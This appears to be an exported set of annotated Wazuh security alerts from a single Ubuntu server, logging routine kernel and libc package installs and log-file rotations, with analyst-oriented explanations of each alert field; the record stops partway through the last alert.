Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  libc-bin
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  2.39-0ubuntu8.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:02.230+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:02.230+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533382.21199
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:01 status installed libc-bin:amd64 2.39-0ubuntu8.4
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Package state or action recorded in the dpkg log on Debian‑based systems – e.g. ‘installed’, ‘half‑configured’, ‘not‑installed’, ‘config‑files’.

data.package:  libc-bin
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
Package architecture as recorded by dpkg (amd64, arm64, or ‘all’ for architecture‑independent packages). Helps pick the correct malware sample or patch.

data.version:  2.39-0ubuntu8.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Log file rotated.

🧠 What happened? Log file rotated.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:04.827+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:04.827+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Log file rotated.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  591
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.5.2', '10.5.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['II_5.1.f', 'IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.9']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC7.2', 'CC7.3', 'PI1.4', 'PI1.5', 'CC7.1', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533384.21668
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: File rotated (inode changed): '/var/log/auth.log'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  logcollector
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Log file rotated.

🧠 What happened? Log file rotated.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:04.827+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:04.827+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Log file rotated.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  591
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.5.2', '10.5.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['II_5.1.f', 'IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.9']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC7.2', 'CC7.3', 'PI1.4', 'PI1.5', 'CC7.1', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533384.22022
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: File rotated (inode changed): '/var/log/syslog'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  logcollector
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Log file rotated.

🧠 What happened? Log file rotated.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:04.827+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:04.827+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Log file rotated.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  591
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['ossec']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.5.2', '10.5.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['10.1']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['II_5.1.f', 'IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.9']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC7.2', 'CC7.3', 'PI1.4', 'PI1.5', 'CC7.1', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533384.22374
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  ossec: File rotated (inode changed): '/var/log/kern.log'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  ossec
Name of the Wazuh decoder that parsed this raw log.

location:  logcollector
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:06.251+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:06.251+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533386.22728
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:06 install linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:08.250+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:08.250+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533388.23170
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:06 install linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:08.250+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:08.250+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533388.23610
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:07 install linux-modules-extra-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-extra-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:12.254+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:12.254+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533392.24064
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:10 status half-configured linux-generic:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:12.254+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:12.254+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533392.24549
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:11 status half-configured linux-image-generic:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:12.254+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:12.254+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533392.25046
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:11 install linux-headers-6.8.0-58:all 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-headers-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  all
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:20.267+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:20.267+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533400.25468
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:19 install linux-headers-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-headers-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.272+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.272+0000
